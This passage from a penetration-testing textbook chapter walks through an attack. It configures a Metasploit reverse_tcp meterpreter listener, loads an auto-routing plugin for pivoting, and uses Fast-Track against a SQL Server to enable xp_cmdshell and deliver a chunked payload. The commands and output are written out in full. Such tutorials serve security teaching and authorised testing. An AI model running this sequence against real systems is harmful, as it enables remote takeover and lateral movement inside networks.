256
Chapter 17
Before launching the attack, we need to set up some options through
msfconsole
. For practice, let’s create our own Metasploit listener manually.
Fast-Track can set it up for you, but we will be adding the
load
auto_add_route
function within Metasploit so that we can automatically connect to systems
on the internal network. We’ll create a listener and launch Fast-Track to attack
the system.
root@bt:/opt/framework3/msf3#
msfconsole
msf >
use multi/handler
msf exploit(handler) >
set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >
set LHOST 172.16.32.129
LHOST => 172.16.32.129
smsf exploit(handler) >
set LPORT 443
LPORT => 443
exploit(handler) >
load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(handler) >
exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >
With our listener waiting for a connection from our soon-to-be compro-
mised target, we launch Fast-Track. (When the
xterm
window opens, close it
since we already have a listener set up.)
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=172.16.32.129,LPORT=443
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
. . . SNIP . . .
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]